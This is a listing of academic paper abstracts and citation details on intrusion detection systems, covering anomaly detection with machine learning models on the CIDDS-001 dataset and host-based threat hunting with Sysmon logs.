An iterative ellipsoid-based anomaly detection technique for intrusion detection systems

2012 ◽  
Author(s):  
Shan Suthaharan
Keyword(s):  
Intrusion Detection ◽  
Anomaly Detection ◽  
Detection Technique ◽  
Intrusion Detection Systems ◽  
Detection Systems

scholarly journals Intelligent Cyber Attack Detection and Classification for Network-Based Intrusion Detection Systems

2021 ◽  
Vol 11 (4) ◽  
pp. 1674
Author(s):  
Nuno Oliveira ◽  
Isabel Praça ◽  
Eva Maia ◽  
Orlando Sousa
Keyword(s):  
Intrusion Detection ◽  
Anomaly Detection ◽  
Information And Communication Technologies ◽  
Network Traffic ◽  
Short Term Memory ◽  
Attack Detection ◽  
Intrusion Detection Systems ◽  
Machine Learning Techniques ◽  
Cyber Attack ◽  
Detection Systems

With the latest advances in information and communication technologies, greater amounts of sensitive user and corporate information are shared continuously across the network, making it susceptible to an attack that can compromise data confidentiality, integrity, and availability. Intrusion Detection Systems (IDS) are important security mechanisms that can perform the timely detection of malicious events through the inspection of network traffic or host-based logs. Many machine learning techniques have proven to be successful at conducting anomaly detection throughout the years, but only a few considered the sequential nature of data. This work proposes a sequential approach and evaluates the performance of a Random Forest (RF), a Multi-Layer Perceptron (MLP), and a Long-Short Term Memory (LSTM) on the CIDDS-001 dataset. The resulting performance measures of this particular approach are compared with the ones obtained from a more traditional one, which only considers individual flow information, in order to determine which methodology best suits the concerned scenario. The experimental outcomes suggest that anomaly detection can be better addressed from a sequential perspective. The LSTM is a highly reliable model for acquiring sequential patterns in network traffic data, achieving an accuracy of 99.94% and an f1-score of 91.66%.

Threat Hunting in Windows Using Big Security Log Data

2020 ◽  
pp. 168-188 ◽  
Author(s):  
Mohammad Rasool Fatemi ◽  
Ali A. Ghorbani
Keyword(s):  
Intrusion Detection ◽  
Anomaly Detection ◽  
Detection System ◽  
Intrusion Detection Systems ◽  
Detection Methods ◽  
Sources Of Information ◽  
Detection Systems ◽  
System Logs ◽  
Analysis System ◽  
Anomaly Detection System

System logs are one of the most important sources of information for anomaly and intrusion detection systems. In a general log-based anomaly detection system, network, devices, and host logs are all collected and used together for analysis and the detection of anomalies. However, the ever-increasing volume of logs remains as one of the main challenges that anomaly detection tools face. Based on Sysmon, this chapter proposes a host-based log analysis system that detects anomalies without using network logs to reduce the volume and to show the importance of host-based logs. The authors implement a Sysmon parser to parse and extract features from the logs and use them to perform detection methods on the data. The valuable information is successfully retained after two extensive volume reduction steps. An anomaly detection system is proposed and performed on five different datasets with up to 55,000 events which detects the attacks using the preserved logs. The analysis results demonstrate the significance of host-based logs in auditing, security monitoring, and intrusion detection systems.

scholarly journals Intrusion Detection Technique for Security Statistics

2018 ◽  
Vol 67 (1) ◽  
pp. 01-08
Author(s):  
Sienna Arscott
Keyword(s):  
Intrusion Detection ◽  
Intrusion Detection System ◽  
Detection System ◽  
Detection Technique ◽  
Intrusion Detection Systems ◽  
Detection Systems ◽  
System Administrator

An Intrusion Detection System (IDS) is an hardware device or programming application that screens organize and additionally framework or host exercises for malevolent exercises or strategy infringement, makes and sends reports to a Management Station or System Administrator which concludes whether to make a move on the interruption or it was just a bogus alert. There are two kinds of Intrusion Detection Systems: Host based and Network based. System Intrusion Detection System (NIDS) distinguishes interruptions by inspecting system traffic and screens different hosts associated with the network.It catches all system traffic and investigates the substance of individual bundles for malicious traffic.

scholarly journals Intelligent Cyber-Attack Detection and Classification for Network-based Intrusion Detection Systems

2020 ◽  
Author(s):  
Nuno Oliveira ◽  
Isabel Praça ◽  
Eva Maia ◽  
Orlando Sousa
Keyword(s):  
Intrusion Detection ◽  
Anomaly Detection ◽  
Information And Communication Technologies ◽  
Network Traffic ◽  
Short Term Memory ◽  
Attack Detection ◽  
Intrusion Detection Systems ◽  
Machine Learning Techniques ◽  
Cyber Attack ◽  
Detection Systems

With the latest advances in information and communication technologies, greater amounts of sensitive user and corporate information are constantly shared across the network making it susceptible to an attack that can compromise data confidentiality, integrity and availability. Intrusion Detection Systems (IDS) are important security mechanisms that can perform a timely detection of malicious events through the inspection of network traffic or host-based logs. Throughout the years, many machine learning techniques have proven to be successful at conducting anomaly detection but only a few considered the sequential nature of data. This work proposes a sequential approach and evaluates the performance of a Random Forest (RF), a Multi-Layer Perceptron (MLP) and a Long-Short Term Memory (LSTM) on the CIDDS-001 dataset. The resulting performance measures of this particular approach are compared with the ones obtained from a more traditional one, that only considers individual flow information, in order to determine which methodology best suits the concerned scenario. The experimental outcomes lead to believe that anomaly detection can be better addressed from a sequential perspective and that the LSTM is a very reliable model for acquiring sequential patterns in network traffic data, achieving an accuracy of 99.94% and a f1-score of 91.66%.

Sign in / Sign up

Export Citation Format

Share Document